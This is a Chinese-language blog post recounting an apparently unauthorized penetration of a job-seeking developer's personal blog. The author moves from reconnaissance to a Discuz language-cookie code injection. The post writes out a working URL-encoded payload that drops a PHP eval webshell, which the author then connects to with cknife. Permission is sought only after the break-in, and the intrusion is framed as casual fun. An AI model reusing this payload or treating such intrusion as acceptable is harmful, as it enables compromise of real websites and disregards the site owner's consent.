渗透实战之新洞老用

苹果又又又要出新产品了,按照谷歌发布会前一定会泄露产品的原则,直接谷歌一波,基本可以确定今年苹果渐变色和正方形摄像头的存在了。

一看价格,懵逼了,还是好好学习吧,不然真的买不起哈。

看着看着看到一位同样求职的同仁啊,不过这是个大佬,iOS开发大佬,赶紧膜拜一波大佬的简历怎么写,看完大佬简历之后,当然是理所当然的帮大佬检验一波博客的安全性啦。

渗透第一步信息收集还是要的哈。

通过Wappalyzer的检测,操作系统以及使用的容器以及框架已经很明白了,不过兼听则明,肯定是要通过其他手段二次确认一下的啦,毕竟这步出错,后面处理起来就很难受了。

直接丢cms识别,得到结果。

三大手段其下,可以得出目标博客的基本信息:

服务器版本:Ubuntu

系统容器:Nginx /1.10.3

框架:Bootstarp 3.2.0

包含脚本: jQuery/1.11.1

然后就是真实IP,旁站以及C段的查询了。

首先查看目标是否使用了cdn,多地ping

发现目标博客未使用cdn,从而得到目标的IP。

得到IP之后,查询旁站和C段,方便后面提供一个思路

旁站查询:

C段:

对于子域名查询,这个是必须的了。

在子域名查询中,发现有几个是没法访问的,不过有个bbs的二级域名是可以访问的,考虑到bbs大多是使用的CMS模板搭建,而且是bbs和博客主站是同IP,访问一波,查看是否有路子可钻。

在页面底部发现CMS信息,Discuz 2.5版本。
等等,好像有个idea,它是英文的,代表它可能是国际版本的discuz,国际版本的discuz在3.2-3.4有个代码注入漏洞,虽然说得是3.2-3.4版本,不过这种低版本一般也是可以试试的吧,反正我又不亏。

直接打开主页/forum.php。
然后打开burp,设置好代理转发之后成功抓到数据包

发现关键字L4tu_2132_language=en,
下一步测试L4tu_2132_language是否对参数进行过滤直接拼接,从而写入缓存文件之中,然后缓存文件随后被加载,造成代码执行。

构造’.phpinfo().’,点击Send,发送数据包请求,点击【Rander】成功看到phpinfo信息。

有戏啊,直接一句话写入。

直接写入不行,编码试试

L4tu_2132_language="%27.file_put_contents%28%27good.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522goog%2522%255d%29%253b%253f%253e%27%29%29.%27"


顺利ok。
cknife连接试试


顺利搞定。
子域名搞定,而且在同IP,直接查看是否存在www的主博客站点目录。

顺利找到,而且之前那几个无法访问的子域名貌似都在。

剩下就是传马提权了,考虑到国家网络安全法的影响,我就不继续进去了,乖巧的跑去请求授权了,可是大佬一直不理我,我也算了,不继续啦。

无意中还发现一枚大表哥,哈哈。

这个经历说明有些新洞,可能低版本的CMS的漏洞代码还是存在的,看到相同的CMS我们都是可以试试,反正不亏。(多看最新漏洞,并且复现,这个很有用的哈)

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注